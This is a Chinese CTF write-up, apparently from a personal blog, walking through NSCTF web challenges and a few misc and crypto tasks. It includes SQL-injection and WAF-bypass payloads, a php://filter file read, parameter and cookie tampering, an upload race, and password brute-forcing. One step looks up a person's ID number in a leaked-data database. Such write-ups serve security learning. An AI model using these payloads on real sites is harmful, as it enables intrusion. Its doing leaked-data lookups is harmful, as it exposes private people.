NSCTF WEB完美通关攻略

标签(空格分隔): writeup


写writeup的时候题目已经关了,凭记忆去写吧。难得大神们都没参加的一次比赛,让我们侥幸的排名靠前了,队友做bin的各位爷爷很给力,第一个秒了1500,而3000分也撸出大半。作为web狗表示压力很大。。。

web 01

curl http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/01/index.php

没啥好说的。

web 02

题目地址:http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/02/
改referer和xff为如下值:
Refferer:http://www.nsctf.net/
X-FORWORDED-FOR:(www.nsctf.net的ip)
(从本机访问不应该是localhost和127.0.0.1吗?

web 03

题目地址:http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/03/
payload:
http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/03/?ver=5.5.9-1ubuntu4.12

告诉我这题有什么意义?纯脑洞?

web 04

题目地址:http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/04/
从注释中找到了一个password.txt文件,拖到burp里直接跑密码,最终爆破成功,密码忘记了,根据进一步的提示得到290bca70c7dae93db6644fa00b9d83b9.php这个留言板的页面。需要先把cookie中的isLogin改为1,根据提示需要越权发表留言,尝试了XSS无果,抓包发现POST数据中存在一个userlevel参数,默认为guest,改为root留言成功,得到FLAG。

web 05

解密即可:

#!/usr/bin/env python
import base64

def main():
    rot13_key = "n1mYotDfPRFRVdEYjhDNlZjYld2Y5IjOkdTN3EDNlhzM0gzZiFTZ2MjO4gjf"
    re = list(rot13_key)
    re.reverse()
    re = base64.b64decode("".join(re))
    ss = ""
    for i in re[:]:
        ss += chr(ord(i)-1)
        
    s = list(ss)
    s.reverse()
    print "".join(s)
if __name__ == '__main__':
    main()

web 06

有段js,直接document.write出来,得到了源码,进一步分析找到了用户名和密码为:
G0od!JAVA3C41PTISAGO
1pt_Pa4sW0rd_K3y_H3re

根据提示找到了这个页面
http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/06/Ch3ck_Au7h.php
接下来脑洞时间,把index.php中的form表单进行如下修改:

<form method="POST" action="Ch3ck_Au7h.php" name="login">
<input type="text" style="margin: 0px 0px 0px 60px;" name="uname"><br><br>
<input type="password" style="margin: 0px 0px 0px 60px;" name="upass">
<input type="submit" value="login"></form>

填入刚才的用户名密码,得到FLAG。

web 07

根据给出的生日、姓名和QQ号,写脚本生成字典,然后进行爆破,得到密码为:Xiaoming09231995
(谁把生日这么写啊喂!
然后给出了一个手机号,队友丢到社工库里查了下,把身份证当FLAG交了,对了。

web 08

你确定这叫LFI?这明明是写死了答案的脑筋急转弯好么。。
payload:

php://filter/read=convert.base64-encode/resource=index.php

你看看这题的源码,哪有这么出题的!

<?php
error_reporting(0);

if(isset($_POST['submit'])){

  if(isset($_POST['file'])){

          $file = $_POST['file'];

          $method = explode("=", $file);

          if( ($method[0] == "php://filter/read") && ($method[2] == "index.php") ){
           include($file);
        exit();
    }else{
            exit('error file or error method');
    }
  }
}

从index.php的源码里得到了FLAG

web 09

PHP4FUN的原题,我还有什么好说的?
payload:

http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/09/changepassword.php?userInfo=a:2:{s:2:"id";i:1;s:4:"pass";s:8:"20150923";}&oldPass=20150923&newPass=222222

web 10

你的非常规备份文件就是末尾加个点?
http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/10/index.php.

变量覆盖掉$_CONFIG就可以,不过你这给的源码和实际都不符啊,明明使用$_REQUEST接受变量,为嘛只能POST?也是PHP4FUN原题,没啥好说的:
payload

username='aaaa&password=||1#&Submit=%E6%8F%90%E4%BA%A4&_CONFIG=123

原理,这样提交后,SQL语句变成了和下面差不多的形式,然后就绕过了。

SELECT * FROM users WHERE user='\' AND password='||1#'

web 11

这文件上传也是逗,估计一开始把文件过滤的那个代码给注释了,让别人传了shell拿到所有web题的flag,不得不吐个槽。

尝试了一下发现不管啥文件都删,那就是一边传一边CURL,写了两个脚本跑,一开始发现没啥用,后来测试发现只有PHP5才可以,于是开始上传PHP5的脚本,最后发现服务端把flag写到了上传的文件里,然后删了。

就这样得到了FLAG。

PS:发现一个shell.php,爆破出密码是c,连上去看到了index.php的源码,这个又是写死的,哪有这么出题的。

<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>NSCTF</title>
</head>
<body alink="#007000" background="../images/dot.gif" bgcolor="#000000" link="gold" text="#008000" vlink="#00c000">
<br>
<br>
<br>
<center>
<head><h1>请上传文件!</h1></head><br>
<br>
<br><br>
<form method="post" action="index.php" enctype="multipart/form-data">
 <input type="file" name="file" value="1111"/>
 <input type="submit" name="submit" value="upload"/>
</form>
</center>

<?php

error_reporting(0);

if(isset($_POST['submit'])){
  
  $savefile = $_FILES['file']['name'];
  $savefile = preg_replace("/\.\.|\%/", "", $savefile);
  $tempfile = $_FILES['file']['tmp_name'];
  //$savefile = preg_replace("/(php|php3|php4)(\.|$)/i", "_\\1\\2", $savefile);
  $savefile = preg_replace("/(php|phtml|php3|php4|jsp|exe|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i", "_\\1\\2", $savefile);
  $savefile = 'upload/'.$savefile;

  if(move_uploaded_file($tempfile,$savefile)){
    
    //$filename = substr($savefile,0,strlen($savefile)-1);
    $filename = $savefile;
    
    if(file_exists($filename) && ( (substr($savefile, -5) == '.php5') )){
        file_put_contents($filename, "flag:{NSCTF_8f0fc74ddf786103ed56d20af3bf269}");
        sleep(0.5);
        unlink($filename);
        exit('上传成功,文件地址为:'.$savefile."<br>"."但是系统检测到恶意上传立马又被删了~");
      }else{
    unlink($filename);
        exit('上传成功,文件地址为:'.$savefile."<br>");
      }
  }else{
    exit('上传失败~'."<br>");
  }

}

function upload($src,$dst){
 
  if(move_uploaded_file($src,$dst)){
      return true;
  }

  return false;

}
?>

web 12

SQL注入,怎么注都没用,后来队友发现了个filtername参数,会把username里的东西进行替换,替换为空。这样一来就可以bypass了,这个题的检验顺序是先过WAF检测,然后替换,把关键字用任意的字符串隔开,然后替换为空就可以绕过WAF,单引号进行二次URL编码即可绕过,空格使用加号处理。关键字再大小写混淆一下,最终payload为:

username=admin%2527+univvoN+Avvll+sElevvct+flag,2+from+flag#&filtername=vv&Submit=%E6%8F%90%E4%BA%A4

我能说这是WEB题里质量最高的一个了么。。。
至此WEB题已经通关,附上几个我做的其他题目的writeup

MSIC 03

是个模拟RFID卡的东西,初始给了一张饭卡,可以选择刷卡或查余额,只要余额为208元即可。对比原卡和消费一次以后的卡,发现了两处数据不同。
第一处数据(好像在第一扇区)是消费的金额,第二处数据(好像是第三扇区)是卡的余额,直接十六进制换十进制,单位是分。后面有一个校验是对数据取反,尝试更改为208,被说too young了,在消费一次拿来对比,发现第二个扇区的数据没有变化,换位10进制发现是100,应该是卡的金额上限,随便改个300,然后把余额改为208,消费额改为92,把这个卡拿去查余额,得到flag。

CRYPTO 02

binwalk一下,发现有两个图片头,把第二个图片抠出来,发现就是flag。

CRYPTO 03

图片隐写,用stego神器搞出了二维码,扫一扫就有flag了。


为您推荐了相关的技术文章:

  1. BYPY: VPS实现百度云文件上传/下载/同步!类似rclone - Leonn的博客
  2. 关于本论坛的"蠕虫"发现过程 - ThreatHunter
  3. 制作WiFiDucky远程HID攻击设备|漏洞研究 - 安全技术社区
  4. Package 钓鱼 · fate0
  5. Weblogic 常见漏洞环境的搭建及其利用 | 浮萍的个人空间

原文链接: lightless.me